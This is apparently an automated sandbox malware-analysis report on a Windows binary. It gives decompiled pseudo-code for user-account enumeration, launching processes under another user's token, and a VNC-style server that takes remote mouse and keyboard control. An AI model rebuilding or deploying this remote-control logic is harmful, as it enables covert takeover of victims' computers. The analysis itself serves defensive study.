GetProcAddress.KERNEL32(00000000,?), ref: 0041CD20
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 0041CD51
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041CD74
FreeLibrary.KERNEL32(00000000), ref: 0041CD9B
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0000000C,?,?), ref: 0041CDD1
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 0041CE0A
NetApiBufferFree.NETAPI32(?,?,?), ref: 0041CEA3
NetApiBufferFree.NETAPI32(?), ref: 0041CEB6
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 0041CEDA

Strings

.exe, xrefs: 0041CDB3, 0041CE5F, 0041CEE6

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: 5e39a4079ee2592e2b10d9816e6c0fcaab334ec2413beb73f2392c93b71dde46
Instruction ID: 8f926784a51602361d6a21b36e697b86514f82b474d971de4b3fa7fd086029e3
Opcode Fuzzy Hash: 5e39a4079ee2592e2b10d9816e6c0fcaab334ec2413beb73f2392c93b71dde46
Instruction Fuzzy Hash: EE619371940218AFCF20DBA0DCC5FEF7BBDAB45304F4045AAF516F2191D7399A898B68

Uniqueness

Uniqueness Score: -1.00%

Function 004132E3, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E004132E3(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E00411A74( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x004132f1
0x004132f4
0x004132fa
0x004132ff
0x0041331d
0x0041331f
0x00413321
0x00413326
0x00413334
0x00413335
0x0041333b
0x0041333c
0x00413343
0x00413345
0x00413345
0x0041334a
0x0041334e
0x00413357
0x0041335c
0x0041335f
0x00413362
0x00413367
0x00413369
0x00413369
0x0041337b
0x00413398
0x004133a3
0x004133a8
0x004133ad
0x004133ad
0x004133b4
0x004133b9
0x004133b9
0x004133b4
0x004133bf
0x004133c6
0x004133cd

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 004132F4
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413313
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041331F
CreateProcessAsUserW.ADVAPI32(?,00000000,0041C4ED,00000000,00000000,00000000,0041C4ED,0041C4ED,00000000,?,?,?,00000000,00000044), ref: 00413390
CloseHandle.KERNEL32(?), ref: 004133A3
CloseHandle.KERNEL32(?), ref: 004133A8
FreeLibrary.KERNEL32(?), ref: 004133BF

Strings

CreateEnvironmentBlock, xrefs: 0041330D
userenv.dll, xrefs: 004132EC
DestroyEnvironmentBlock, xrefs: 00413315

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: 29f0d418c44b12f8a1955e8c05a9a48ab796327e3a33c267dc67c2126bae49af
Instruction ID: 5233cac688404e5bbfdc5a2a24ce46039259bf70aa23ebafeaeed5178dfaa360
Opcode Fuzzy Hash: 29f0d418c44b12f8a1955e8c05a9a48ab796327e3a33c267dc67c2126bae49af
Instruction Fuzzy Hash: 2F2105B2D0021DBFDF109FA5CC849EEBBBCEB48345F10846AE911B2160D6399E44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041115E, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0041115E(void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, signed char _a15, void* _a16) {
				signed int _v8;
				signed int _v13;
				signed short _v15;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v31;
				signed int _v32;
				signed int _v36;
				short _v41;
				short _v43;
				char _v44;
				char _v49;
				char _v52;
				char _v53;
				char _v56;
				char _v60;
				signed int _v64;
				char _v77;
				char _v78;
				unsigned int _v80;
				signed int _v84;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed int _v109;
				char _v112;
				char _v116;
				char _v124;
				char _v380;
				void* __edi;
				void* __esi;
				void* _t205;
				char _t206;
				void* _t208;
				signed char _t212;
				unsigned int _t220;
				signed int _t225;
				signed int _t257;
				signed int _t261;
				signed int _t262;
				void* _t264;
				signed int _t265;
				void* _t274;
				void* _t280;
				signed int _t288;
				signed int _t289;
				void* _t291;
				signed int _t292;
				signed short _t296;
				unsigned int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t305;
				signed int _t309;
				void* _t311;
				signed int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				void* _t321;
				signed int _t322;
				signed int _t329;
				void* _t331;
				signed int _t332;
				signed int _t333;
				signed char _t335;
				void* _t352;
				signed int _t353;
				void* _t355;
				signed int _t356;
				signed int _t366;
				signed int _t375;
				signed int _t382;
				signed int _t389;
				signed int _t390;
				unsigned int _t426;
				signed char _t442;
				signed char _t444;
				signed char _t446;
				signed int _t452;
				signed int _t461;
				void* _t472;
				signed int _t479;
				signed int _t490;
				signed int _t491;
				signed int _t496;
				char _t505;
				intOrPtr _t506;
				signed int _t507;
				signed short _t509;
				intOrPtr* _t517;
				signed int _t525;
				void* _t527;

				_t506 = _a8;
				_t206 = E004149EB(_t205, _a4, "RFB 003.003\n", 0xc);
				if(_t206 == 0) {
					L107:
					return _t206;
				}
				_push(0x1b7740);
				_push( &_v60);
				_t208 = 0xc;
				_t206 = E00414974(_t208, _a4);
				if(_t206 == 0) {
					goto L107;
				}
				_push( &_v60);
				_t472 = 4;
				_t206 = E00412524(_t472, "RFB ", _t472);
				if(_t206 != 0) {
					goto L107;
				}
				_v53 = _t206;
				_v49 = _t206;
				_t212 = E00412040( &_v52, "RFB ", 0);
				_t206 = ((E00412040( &_v56, "RFB ", 0) & 0x000000ff | (_t212 & 0x000000ff) << 0x00000008) & 0x0000ffff) + 0xfffffcfd;
				if(_t206 > 0x300) {
					goto L107;
				} else {
					_v24 = _v24 & 0x00000000;
					_v20 = 1;
					 *((intOrPtr*)(_t506 + 4))( &_v24);
					_t220 = _v20;
					_t479 = (_t220 & 0x0000ff00 | _t220 << 0x00000010) << 8;
					_t399 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					_v36 = (_t220 & 0x00ff0000 | _t220 >> 0x00000010) >> 0x00000008 | _t479;
					if(E004149EB( &_v36, _a4,  &_v36, 4) == 0) {
						_v20 = _v20 | 0xffffffff;
					}
					_t225 = _v20;
					if(_t225 == 0) {
						return E004110F8(_t399, __eflags, _a4, _v24);
					}
					_t206 = _t225 - 1;
					if(_t206 != 0) {
						goto L107;
					}
					_t206 = E00414974(1, _a4,  &_v31, 0x1b7740);
					if(_t206 == 0) {
						goto L107;
					}
					_t206 =  *((intOrPtr*)(_t506 + 8))();
					if(_t206 == 0) {
						goto L107;
					}
					_v36 = _v36 & 0x00000000;
					_t206 =  *((intOrPtr*)(_t506 + 0xc))( &_v124);
					_t403 = _t206;
					_t541 = _t206;
					if(_t206 == 0) {
						goto L107;
					}
					_t206 = E00410F37( &_v124, _t403,  &_v36, _t541, _a12);
					_t505 = _t206;
					if(_t505 == 0) {
						goto L107;
					}
					_t507 = E004124FE(_v36);
					_v104 =  *(_t505 + 8) << 0x00000008 |  *(_t505 + 9) & 0x000000ff;
					_v102 =  *(_t505 + 0xa) << 0x00000008 |  *(_t505 + 0xb) & 0x000000ff;
					_v84 = (_t507 & 0x00ff0000 | _t507 >> 0x00000010) >> 0x00000008 | (_t507 << 0x00000010 | _t507 & 0x0000ff00) << 0x00000008;
					_t44 = _t505 + 0x20; // 0x20
					E004119FD( &_v100, _t44, 0x10);
					asm("rol word [ebp-0x5c], 0x8");
					asm("rol word [ebp-0x5a], 0x8");
					asm("rol word [ebp-0x58], 0x8");
					if(E004149EB( &_v104, _a4,  &_v104, 0x18) == 0 || _t507 > 0 && E004149EB(_t247, _a4, _v36, _t507) == 0) {
						return E004110C5(_t505);
					} else {
						_v41 = 0xffff;
						_v44 = 0;
						_v43 = 0xffff;
						E00411A74( &_v380,  &_v380, 0, 0xff);
						E00411A74( &_v380,  &_v380, 0, 0xff);
						_v8 = 0;
						_v20 = 0;
						goto L16;
						do {
							while(1) {
								L16:
								_t375 = _v8;
								_t509 = 0;
								if(_t375 <= 0) {
									goto L35;
								}
								L17:
								_t274 = E00414C71(0,  &_a4, 0x12c, 0);
								if(_t274 != 0xffffffff) {
									goto L35;
								}
								__imp__#111();
								if(_t274 != 0x274c) {
									L104:
									E004110C5(_t505);
									return E004119C1(_v20);
								}
								if(_a16 != 0) {
									WaitForSingleObject(_a16, 0xffffffff);
								}
								 *((intOrPtr*)(_a8 + 0x10))();
								_v28 = _t509;
								if(_t375 <= _t509) {
									L33:
									if(_a16 != _t509) {
										ReleaseMutex(_a16);
									}
									continue;
									do {
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
										L90:
										__eflags =  *(_t505 + 0x1c);
									} while ( *(_t505 + 0x1c) != 0);
									break;
								} else {
									_v24 = _t509;
									_t390 = _t375 * 9;
									do {
										_t527 = _v24 + _v20;
										if( *((short*)(_t527 + 5)) > 0 &&  *((short*)(_t527 + 7)) > 0) {
											_push(_t527);
											_push(_a4);
											_t280 = E00410BCF(_t505);
											if(_t280 == 0xffffffff || _t280 == 0) {
												__eflags = _a16;
												if(_a16 != 0) {
													ReleaseMutex(_a16);
												}
												goto L104;
											} else {
												if(_t280 == 1) {
													_t283 = _v28 + 1;
													if(_v28 + 1 != _v8) {
														E00411A74(_t283, _t527, 0, 9);
													} else {
														_v8 = _v8 - 1;
														_t390 = _t390 - 9;
														E0041194C(_t390,  &_v20);
													}
												}
												goto L31;
											}
										}
										L31:
										_v28 = _v28 + 1;
										_v24 = _v24 + 9;
									} while (_v28 < _v8);
									_t509 = 0;
									goto L33;
								}
								L35:
								_t376 = _a4;
								_t414 = _a4;
								_t257 = E00414974(1, _a4,  &_a15, 0x1b7740);
								__eflags = _t257;
								if(_t257 == 0) {
									goto L104;
								}
								_t261 = _a15 & 0x000000ff;
								__eflags = _t261;
								if(_t261 == 0) {
									_t262 = E004149BC(_t414, _t376, 3, 0x1b7740);
									__eflags = _t262;
									if(_t262 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v80);
									_t264 = 0x10;
									_t265 = E00414974(_t264, _t376);
									__eflags = _t265;
									if(_t265 == 0) {
										goto L104;
									}
									__eflags = _v80 - 0x20;
									if(_v80 == 0x20) {
										L99:
										__eflags = _v77;
										if(_v77 == 0) {
											goto L104;
										}
										asm("rol word [ebp-0x48], 0x8");
										asm("rol word [ebp-0x46], 0x8");
										asm("rol word [ebp-0x44], 0x8");
										__eflags = _v78;
										_v78 = _t265 & 0xffffff00 | _v78 != 0x00000000;
										_t196 = _t505 + 0x31; // 0x31
										_v77 = 1;
										E004119FD(_t196,  &_v80, 0x10);
										 *(_t505 + 0x41) = _v80 >> 3;
										while(1) {
											L16:
											_t375 = _v8;
											_t509 = 0;
											if(_t375 <= 0) {
												goto L35;
											}
											goto L17;
										}
									}
									__eflags = _v80 - 0x10;
									if(_v80 == 0x10) {
										goto L99;
									}
									__eflags = _v80 - 8;
									if(_v80 != 8) {
										goto L104;
									}
									goto L99;
								}
								_t288 = _t261;
								__eflags = _t288;
								if(_t288 == 0) {
									_t289 = E004149BC(_t414, _t376, 1, 0x1b7740);
									__eflags = _t289;
									if(_t289 == 0) {
										goto L104;
									}
									_push(0x1b7740);
									_push( &_v32);
									_t291 = 2;
									_t292 = E00414974(_t291, _t376);
									__eflags = _t292;
									if(_t292 == 0) {
										goto L104;
									}
									 *(_t505 + 0x4c) =  *(_t505 + 0x4c) & 0x00000000;
									_t296 = (_v32 & 0xff) << 0x00000008 | (_v32 & 0x0000ffff) >> 0x00000008;
									 *(_t505 + 0x48) = _t296;
									__eflags = _t296;
									if(_t296 == 0) {
										L89:
										_t297 =  *(_t505 + 0x4c);
										_t490 = (_t297 << 0x00000010 | _t297 & 0x0000ff00) << 0x00000008 | _t297 >> 0x00000008 & 0x0000ff00 |  *(_t505 + 0x4f) & 0x000000ff;
										 *(_t505 + 0x50) = _t490;
										__eflags = _t297 - 5;
										if(_t297 != 5) {
											E004119C1( *(_t505 + 0x1c));
											 *(_t505 + 0x1c) =  *(_t505 + 0x1c) & 0x00000000;
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
										}
										goto L90;
									}
									_t378 = (_t296 & 0x0000ffff) << 2;
									_t161 = _t505 + 0x44; // 0x44
									_t517 = _t161;
									_t301 = E0041194C((_t296 & 0x0000ffff) << 2, _t517);
									__eflags = _t301;
									if(_t301 == 0) {
										goto L104;
									}
									_t303 = E00414974(_t378, _a4,  *_t517, 0x1b7740);
									__eflags = _t303;
									if(_t303 == 0) {
										goto L104;
									}
									_v28 = _v28 & 0x00000000;
									__eflags = 0 -  *(_t505 + 0x48);
									if(0 >=  *(_t505 + 0x48)) {
										goto L89;
									}
									_t305 =  *_t517;
									do {
										_t491 = _v28 & 0x0000ffff;
										 *(_t305 + _t491 * 4) = ( *(_t305 + _t491 * 4) << 0x00000010 |  *(_t305 + _t491 * 4) & 0x0000ff00) << 0x00000008 | (_t305 + _t491 * 4)[0] & 0x000000ff |  *(_t305 + _t491 * 4) >> 0x00000008 & 0x0000ff00;
										_t305 =  *((intOrPtr*)(_t505 + 0x44));
										_t426 = 5;
										__eflags =  *(_t305 + _t491 * 4) - _t426;
										if( *(_t305 + _t491 * 4) == _t426) {
											 *(_t505 + 0x4c) = _t426;
										}
										_v28 = _v28 + 1;
										__eflags = _v28 -  *(_t505 + 0x48);
									} while (_v28 <  *(_t505 + 0x48));
									goto L89;
								}
								_t309 = _t288 - 1;
								__eflags = _t309;
								if(_t309 == 0) {
									_push(0x1b7740);
									_push( &_v56);
									_t311 = 9;
									_t312 = E00414974(_t311, _t376);
									__eflags = _t312;
									if(_t312 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0x33], 0x8");
									asm("rol word [ebp-0x31], 0x8");
									asm("rol word [ebp-0x2f], 0x8");
									asm("rol word [ebp-0x2d], 0x8");
									__eflags = _v56;
									_t382 = 0;
									_v56 = _t312 & 0xffffff00 | _v56 != 0x00000000;
									__eflags = _v8;
									if(_v8 <= 0) {
										L76:
										__eflags = _t382 - _v8;
										if(_t382 != _v8) {
											L78:
											E004119FD(_t382 * 9 + _v20,  &_v56, 9);
											while(1) {
												L16:
												_t375 = _v8;
												_t509 = 0;
												if(_t375 <= 0) {
													goto L35;
												}
												goto L17;
											}
											goto L35;
										}
										_v8 = _v8 + 1;
										_t316 = E0041194C(_v8 * 9,  &_v20);
										__eflags = _t316;
										if(_t316 == 0) {
											goto L104;
										}
										goto L78;
									}
									_t318 = _v20 + 7;
									__eflags = _t318;
									do {
										__eflags =  *(_t318 - 2);
										if( *(_t318 - 2) != 0) {
											goto L75;
										}
										__eflags =  *_t318;
										if( *_t318 == 0) {
											goto L76;
										}
										L75:
										_t382 = _t382 + 1;
										_t318 = _t318 + 9;
										__eflags = _t382 - _v8;
									} while (_t382 < _v8);
									goto L76;
								}
								_t319 = _t309 - 1;
								__eflags = _t319;
								if(_t319 == 0) {
									_push(0x1b7740);
									_push( &_v112);
									_t321 = 7;
									_t322 = E00414974(_t321, _t376);
									__eflags = _t322;
									if(_t322 == 0) {
										goto L104;
									}
									__eflags = _v112;
									_t490 = (_v109 & 0x00ff0000 | _v109 >> 0x00000010) >> 0x00000008 | (_v109 << 0x00000010 | _v109 & 0x0000ff00) << 0x00000008;
									 *((intOrPtr*)(_a8 + 0x14))((_t322 & 0xffffff00 | _v112 != 0x00000000) & 0x000000ff);
									continue;
								}
								_t329 = _t319 - 1;
								__eflags = _t329;
								if(_t329 == 0) {
									_push(0x1b7740);
									_push( &_v16);
									_t331 = 5;
									_t332 = E00414974(_t331, _t376);
									__eflags = _t332;
									if(_t332 == 0) {
										goto L104;
									}
									asm("rol word [ebp-0xb], 0x8");
									asm("rol word [ebp-0x9], 0x8");
									_v24 = _v24 & 0x00000000;
									_t525 = 0x8000;
									_t333 = GetSystemMetrics(0x17);
									__eflags = _t333;
									_t496 = _t490 & 0xffffff00 | _t333 != 0x00000000;
									__eflags = _v15 - _v43;
									if(_v15 != _v43) {
										L50:
										_t525 = 0x8001;
										L51:
										_t335 = _v44;
										_t442 = _v16 & 0x00000001;
										__eflags = _t442 - (_t335 & 0x00000001);
										if(_t442 != (_t335 & 0x00000001)) {
											__eflags = _t442;
											if(_t442 == 0) {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x0000000c) + 4;
												__eflags = _t461;
											} else {
												__eflags = _t496;
												_t461 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0x00000006) + 2;
											}
											_t525 = _t525 | _t461;
											__eflags = _t525;
										}
										_t444 = _v16 & 0x00000004;
										__eflags = _t444 - (_t335 & 0x00000004);
										if(_t444 != (_t335 & 0x00000004)) {
											__eflags = _t444;
											if(_t444 == 0) {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffff4) + 0x10;
												__eflags = _t452;
											} else {
												__eflags = _t496;
												_t452 = ((0 | _t496 == 0x00000000) - 0x00000001 & 0xfffffffa) + 8;
											}
											_t525 = _t525 | _t452;
											__eflags = _t525;
										}
										_t446 = _v16 & 0x00000002;
										__eflags = _t446 - (_t335 & 0x00000002);
										if(_t446 != (_t335 & 0x00000002)) {
											__eflags = _t446;
											_t525 = _t525 | ((0 | _t446 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x00000040;
											__eflags = _t525;
										}
										__eflags = _v16 & 0x00000008;
										if((_v16 & 0x00000008) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0x78;
										}
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) != 0) {
											_t525 = _t525 | 0x00000800;
											__eflags = _t525;
											_v24 = 0xffffff88;
										}
										E004119FD( &_v44,  &_v16, 5);
										_t490 = _t525;
										 *((intOrPtr*)(_a8 + 0x18))(_v15 & 0x0000ffff, _v13 & 0x0000ffff, _v24);
										continue;
									}
									__eflags = _v13 - _v41;
									if(_v13 == _v41) {
										goto L51;
									}
									goto L50;
								}
								__eflags = _t329 != 1;
								if(_t329 != 1) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v116);
								_t352 = 3;
								_t353 = E00414974(_t352, _t376);
								__eflags = _t353;
								if(_t353 == 0) {
									goto L104;
								}
								_push(0x1b7740);
								_push( &_v64);
								_t355 = 4;
								_t356 = E00414974(_t355, _t376);
								__eflags = _t356;
								if(_t356 == 0) {
									goto L104;
								}
								_v64 = (_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008;
								_t389 = E00411991(((_v64 & 0x00ff0000 | _v64 >> 0x00000010) >> 0x00000008 | (_v64 << 0x00000010 | _v64 & 0x0000ff00) << 0x00000008) + 1);
								__eflags = _t389;
								if(_t389 == 0) {
									E004119C1(0);
									goto L104;
								}
								_t366 = E00414974(_v64, _a4, _t389, 0x1b7740);
								__eflags = _t366;
								if(_t366 == 0) {
									goto L104;
								}
								_t490 = _v64;
								 *((intOrPtr*)(_a8 + 0x1c))(_t389);
								E004119C1(_t389);
							}
							_t300 = E00411991(0x400);
							 *(_t505 + 0x1c) = _t300;
							__eflags = _t300;
						} while (_t300 != 0);
						goto L104;
					}
				}
			}

0x00411169
0x00411177
0x0041117e
0x00411949
0x00411949
0x00411949
0x00411187
0x0041118f
0x00411192
0x00411193
0x0041119a
0x00000000
0x00000000
0x004111a3
0x004111a6
0x004111ae
0x004111b5
0x00000000
0x00000000
0x004111bb
0x004111be
0x004111c6
0x004111e3
0x004111f0
0x00000000
0x004111f6
0x004111f8
0x00411204
0x00411207
0x0041120a
0x00411232
0x00411239
0x0041123b
0x00411245
0x00411247
0x00411247
0x0041124e
0x00411251
0x00000000
0x00411940
0x00411257
0x00411258
0x00000000
0x00000000
0x0041126c
0x00411273
0x00000000
0x00000000
0x00411282
0x00411287
0x00000000
0x00000000
0x0041128f
0x0041129a
0x0041129d
0x0041129f
0x004112a1
0x00000000
0x00000000
0x004112ad
0x004112b2
0x004112b6
0x00000000
0x00000000
0x004112c8
0x004112d5
0x004112e8
0x0041130d
0x00411312
0x0041131a
0x0041131f
0x00411324
0x00411329
0x0041133e
0x00000000
0x0041135e
0x0041136b
0x00411377
0x0041137a
0x0041137e
0x0041138c
0x00411391
0x00411394
0x00411394
0x00411397
0x00411397
0x00411397
0x00411397
0x0041139a
0x0041139e
0x00000000
0x00000000
0x004113a4
0x004113b0
0x004113b8
0x00000000
0x00000000
0x004113be
0x004113c9
0x00411920
0x00411922
0x00000000
0x0041192a
0x004113d2
0x004113d9
0x004113d9
0x004113e4
0x004113e7
0x004113ec
0x0041145f
0x00411462
0x0041146b
0x0041146b
0x00000000
0x00411397
0x00411397
0x00411397
0x00411397
0x0041139a
0x0041139e
0x00000000
0x00000000
0x00000000
0x0041139e
0x00411861
0x00411861
0x00411861
0x00000000
0x004113ee
0x004113ee
0x004113f1
0x004113f4
0x004113f7
0x004113ff
0x00411408
0x00411409
0x0041140e
0x00411416
0x00411908
0x0041190c
0x00411911
0x00411911
0x00000000
0x00411424
0x00411427
0x0041142c
0x00411430
0x00411449
0x00411432
0x00411432
0x00411435
0x0041143d
0x0041143d
0x00411430
0x00000000
0x00411427
0x00411416
0x0041144e
0x0041144e
0x00411454
0x00411458
0x0041145d
0x00000000
0x0041145d
0x00411476
0x00411476
0x00411486
0x00411488
0x0041148d
0x0041148f
0x00000000
0x00000000
0x00411499
0x00411499
0x0041149c
0x0041189a
0x0041189f
0x004118a1
0x00000000
0x00000000
0x004118a3
0x004118a7
0x004118aa
0x004118ad
0x004118b2
0x004118b4
0x00000000
0x00000000
0x004118b6
0x004118ba
0x004118c8
0x004118c8
0x004118cc
0x00000000
0x00000000
0x004118ce
0x004118d3
0x004118d8
0x004118dd
0x004118e6
0x004118ed
0x004118f1
0x004118f5
0x00411900
0x00411397
0x00411397
0x00411397
0x0041139a
0x0041139e
0x00000000
0x00000000
0x00000000
0x0041139e
0x00411397
0x004118bc
0x004118c0
0x00000000
0x00000000
0x004118c2
0x004118c6
0x00000000
0x00000000
0x00000000
0x004118c6
0x004114a3
0x004114a3
0x004114a4
0x00411765
0x0041176a
0x0041176c
0x00000000
0x00000000
0x00411772
0x00411776
0x00411779
0x0041177c
0x00411781
0x00411783
0x00000000
0x00000000
0x0041178d
0x0041179e
0x004117a0
0x004117a4
0x004117a7
0x00411834
0x00411834
0x00411857
0x00411859
0x0041185c
0x0041185f
0x00411888
0x0041188d
0x00411397
0x00411397
0x00411397
0x0041139a
0x0041139e
0x00000000
0x00000000
0x00000000
0x0041139e
0x00411397
0x00000000
0x0041185f
0x004117b0
0x004117b3
0x004117b3
0x004117b8
0x004117bd
0x004117bf
0x00000000
0x00000000
0x004117d1
0x004117d6
0x004117d8
0x00000000
0x00000000
0x004117de
0x004117e4
0x004117e8
0x00000000
0x00000000
0x004117ea
0x004117ec
0x004117ec
0x00411817
0x00411819
0x0041181e
0x0041181f
0x00411822
0x00411824
0x00411824
0x00411827
0x0041182e
0x0041182e
0x00000000
0x004117ec
0x004114aa
0x004114aa
0x004114ab
0x004116d4
0x004116d8
0x004116db
0x004116de
0x004116e3
0x004116e5
0x00000000
0x00000000
0x004116eb
0x004116f0
0x004116f5
0x004116fa
0x004116ff
0x00411708
0x0041170a
0x0041170d
0x00411710
0x0041172c
0x0041172c
0x0041172f
0x0041174a
0x00411757
0x00411397
0x00411397
0x00411397
0x0041139a
0x0041139e
0x00000000
0x00000000
0x00000000
0x0041139e
0x00000000
0x00411397
0x00411731
0x0041173d
0x00411742
0x00411744
0x00000000
0x00000000
0x00000000
0x00411744
0x00411715
0x00411715
0x00411718
0x00411718
0x0041171c
0x00000000
0x00000000
0x0041171e
0x00411721
0x00000000
0x00000000
0x00411723
0x00411723
0x00411724
0x00411727
0x00411727
0x00000000
0x00411718
0x004114b1
0x004114b1
0x004114b2
0x0041167f
0x00411683
0x00411686
0x00411689
0x0041168e
0x00411690
0x00000000
0x00000000
0x00411696
0x004116c8
0x004116cc
0x00000000
0x004116cc
0x004114b8
0x004114b8
0x004114b9
0x00411559
0x0041155d
0x00411560
0x00411563
0x00411568
0x0041156a
0x00000000
0x00000000
0x00411570
0x00411575
0x0041157a
0x00411580
0x00411585
0x0041158b
0x00411591
0x00411594
0x00411598
0x004115a4
0x004115a4
0x004115a9
0x004115a9
0x004115b1
0x004115b7
0x004115b9
0x004115bb
0x004115bd
0x004115d1
0x004115da
0x004115da
0x004115bf
0x004115c1
0x004115ca
0x004115ca
0x004115dd
0x004115dd
0x004115dd
0x004115e4
0x004115ea
0x004115ec
0x004115ee
0x004115f0
0x00411604
0x0041160d
0x0041160d
0x004115f2
0x004115f4
0x004115fd
0x004115fd
0x00411610
0x00411610
0x00411610
0x00411615
0x0041161a
0x0041161c
0x00411620
0x0041162c
0x0041162c
0x0041162c
0x0041162e
0x00411632
0x00411634
0x00411634
0x0041163a
0x0041163a
0x00411641
0x00411645
0x00411647
0x00411647
0x0041164d
0x0041164d
0x0041165e
0x0041166a
0x00411677
0x00000000
0x00411677
0x0041159e
0x004115a2
0x00000000
0x00000000
0x00000000
0x004115a2
0x004114bf
0x004114c0
0x00000000
0x00000000
0x004114c6
0x004114ca
0x004114cd
0x004114d0
0x004114d5
0x004114d7
0x00000000
0x00000000
0x004114dd
0x004114e1
0x004114e4
0x004114e7
0x004114ec
0x004114ee
0x00000000
0x00000000
0x0041151a
0x00411523
0x00411525
0x00411527
0x0041191b
0x00000000
0x0041191b
0x00411535
0x0041153a
0x0041153c
0x00000000
0x00000000
0x00411545
0x0041154b
0x0041154f
0x0041154f
0x00411870
0x00411875
0x00411878
0x00411878
0x00000000
0x00411880
0x0041133e

APIs

Part of subcall function 004149EB: send.WS2_32(00000000,00000000,00000000,00000000), ref: 004149F9

WSAGetLastError.WS2_32(?,0000012C,00000000,00000031,00000020,00000010,0041AC3E,001B7740,?,00000003,001B7740,?,001B7740,?,00000000), ref: 004113BE
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 004113D9
ReleaseMutex.KERNEL32(00000000,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 0041146B
GetSystemMetrics.USER32 ref: 00411585

Part of subcall function 00414974: recv.WS2_32(?,?,00000001,00000000), ref: 00414998

ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000000,000000FF,?,?,00000018,?,00000020,00000010,?), ref: 00411911

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

Strings

RFB 003.003, xrefs: 0041116F
RFB , xrefs: 004111A9
x, xrefs: 0041163A
, xrefs: 004118B6

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
